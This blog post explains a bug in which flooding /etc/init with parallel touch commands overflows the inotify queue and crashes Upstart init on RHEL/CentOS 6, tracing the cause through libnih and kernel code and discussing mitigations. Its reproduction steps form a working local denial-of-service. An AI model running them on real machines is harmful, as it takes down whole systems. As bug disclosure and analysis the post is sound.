Kill init by touching a bunch of files

init is a pretty big deal on a Linux box. If you manage to kill it, the machine panics. Everything stops, and if you're lucky, it reboots by itself a few seconds or minutes later. Naturally, you'd like it to be stable and robust so that your machine doesn't go down.

What if I told you I found a way to kill the "Upstart" init in RHEL and CentOS 6 with just a bunch of "touch" commands? Yep, it's true. You can even reproduce it in qemu. In fact, I had to do it in there in order to get these screenshots.

Step 1: Create a new directory under /etc/init. I called mine "kill.the.box".

Step 2: Fill that path with a few hundred or thousand files. I used 'touch $(seq 1 1000)' but do it however you like.

Step 3: Kick off a bunch of changes to those files in parallel. As you can see here, I started 10 instances of 'touch', each one receiving 7 copies of the list of files thanks to the shell expanding all of those asterisks.

One you lock the target, two you bait the line

Step 4: Wait. It takes a little while to happen on the emulated machine, at least. Bare metal might be more forthcoming. You will be rewarded with the following:

Step 5: There is no step 5 unless you're curious. I rigged up syslog in the emulated machine to fling data outward so I could see it with tcpdump on my actual workstation machine. With that, you can finally see why the box dies.

Here's the text transcribed for the sake of those web indexing sites...

Nov 23 23:27:49 centos6 init: watch.c:202: Assertion failed in nih_watch_handle_by_wd: wd >= 0
Nov 23 23:27:49 centos6 init: Caught abort, core dumped

Actually understanding this takes a bit of digging. First, you learn that init on RHEL and CentOS 6 is something called Upstart, and that it uses something called "libnih" to do a lot of work. One of the utilities provided by that library is the ability to watch files and directories for changes.

In this case, init uses libnih's "watch" feature to keep tabs on its configuration files, so when they change it can know about it. If you poke around in the source, you can find that it actually registers watches for the entire directory of its config file for various reasons, so it winds up following /etc (due to /etc/init.conf) and /etc/init (its "job dir").

This takes us down into libnih. It opens an inotify socket and tells the kernel what the caller (Upstart's init) wants to see. Then it waits around to receive updates from the kernel on that socket. It takes the raw data received on the socket, aligns a "struct inotify_event" over that buffer, and reads out the result.

One of the fields in that buffer is "wd" -- the watch descriptor. This is an opaque number you get from the kernel when you set up a watch. That is, inotify_add_watch() might return 4, and then later, the struct you get back will have 4 in the "wd" field. Easy enough.

libnih's consumer of this data then has the actual line of code which causes things to die. It asserts that "wd" is greater than or equal to 0. Normally, that would be true, but here it obviously isn't. The assert fires a SIGABRT, init goes down, and the system goes with it.

What's going on from here requires leaving userspace behind and going into the kernel code. inotify itself has the concept of a "notification overflow". When you first create an inotify instance, it creates an event that already has all of the flags set up to say "hey, something went wrong". This way, the memory is already allocated and is ready to roll should it need it later.

If for some reason you manage to fill up the event queue and it needs to write something more, it will then send you that prepopulated event. It's not like a normal event: its "mask" is FS_Q_OVERFLOW. You're supposed to notice that and presumably treat it differently. Unfortunately, libnih barrels on ahead and I get fodder for another post.

So where does the negative value for "wd" (the one tripping the assert) come from? Just eyeballing the kernel code for "copy_event_to_user" shows me a likely source:

/* we get the inotify watch descriptor from the event private data */
spin_lock(&event->lock);
fsn_priv = fsnotify_remove_priv_from_event(group, event);
spin_unlock(&event->lock);
 
if (!fsn_priv)
	inotify_event.wd = -1;

In a nutshell, when there's private data, get the wd value from it, otherwise set it to -1. We can be fairly certain there's no private data for this pseudo-event because of a nice comment back in fsnotify_add_notify_event where it actually detects the overflow and goes into fallback mode:

/* sorry, no private data on the overflow event */
priv = NULL;

(Note: I've only eyeballed the kernel part. It might be off a bit.)

It's starting to make sense. You flood the filesystem with changes, such that inotify has a lot to say. You do it faster than they can be consumed, so the queue fills up. Then it fires off a notification about the overflow which has no private data by design, and that creates a message to userspace with wd set to -1. wd must be non-negative (>= 0) or the code asserts, so the assert fires, the program dies, and the box goes with it.

Given all of this, the right approach would seem to be a patch to libnih so it notices the warning given by the kernel and does something different. Or, maybe, some kind of option to let the ultimate consumer (init, in this case) get a message without being slayed brutally by the assert.

Of course, this already happened: someone wrote a patch... in 2011.

Yep, really. Go look.

That said, the patch was rejected, and that's that. The bug lives on.

I should point out that this is not theoretical. I went through all of the above because some real machines hit this for some reason. I don't have access to them, so I had to work backwards from just the message logged by init. Then I worked forwards with a successful reproduction case to get to this point. I have no idea what the original machines are doing to make this fire, but it's probably something bizarre like spamming /etc with whatever kinds of behavior will generate those inotify events libnih asked to see.

Let me say this again: this happens in the wild. The "touch * * *..." repro looks contrived, because, well, that's the whole point of a repro.

If you're wondering how big the inotify queue is, well, it's probably 16384 on your machine. Run "sysctl fs.inotify.max_queued_events" to see exactly what it is. If you're thinking you can raise that to avoid the possibility of hitting the bug, you're probably right, but not necessarily. It only gets used when the inotify instance is set up.

group = inotify_new_group(inotify_max_queued_events);

So, in all likelihood, init will be running with the old value if you raise it later. You can try to get init to re-exec itself and hopefully establish new watches, or try to get that value raised via the kernel command line so it's already set to a higher value when init shows up. Or you could edit fs/inotify/inotify_user.c. Whatever.

Of course, it would be far better for libnih to be patched to handle this and for a new release to be pushed to RHEL, CentOS and whatever else, but what are you going to do?

Kill init by touching a bunch of files

Kill init by touching a bunch of files

Recommend

The load-balanced capture effect

Server migration, IPv6, and bye bye to the beach

SHA2 certificate now online

Some features just aren't worth the trouble

The dangers of resetting everything at once

Filter all ICMP and watch the world burn

It's all fun and games until someone [XOFF]

One checkbox equals non-UTC fun

Troubleshooting another spot of downtime

A mystery with memory leaks and a magic number

About Joyk